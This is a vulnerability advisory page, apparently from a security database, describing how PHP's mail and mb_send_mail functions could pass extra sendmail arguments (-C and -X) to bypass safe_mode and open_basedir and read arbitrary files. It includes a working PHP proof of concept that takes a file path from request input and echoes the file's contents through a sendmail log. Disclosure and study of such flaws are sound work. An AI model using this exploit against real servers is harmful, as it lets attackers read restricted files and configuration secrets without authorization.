(PHP) mb_send_mail security bypass

2006.03.01
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

Vulnerable: PHP4, PHP5 with use of sendmail 8.13.4 >< When safemode disabled and open_basedir restriction in effect, we can pass extra parameters to sendmail command in mail function, especially the -C and -X arguments. -C for alternate configuration file -X to log all in a file Can be used to view files, pass the file to view to C argument and store content in file passed to X argument. When safemode enabled and open_basedir restriction in effect, we can pass extra parameters to sendmail command in mb_send_mail function. Solution: Use other sendmail command and don't allow extra parameters for mb_send_mail when safemode enabled <?php if (isset($_REQUEST['file'])) { $file = "sendlog"; if (file_exists($file)) unlink($file); $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file; mb_send_mail(NULL, NULL, NULL, NULL, $extra); echo "<pre>".file_get_contents($file)."</pre>"; } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top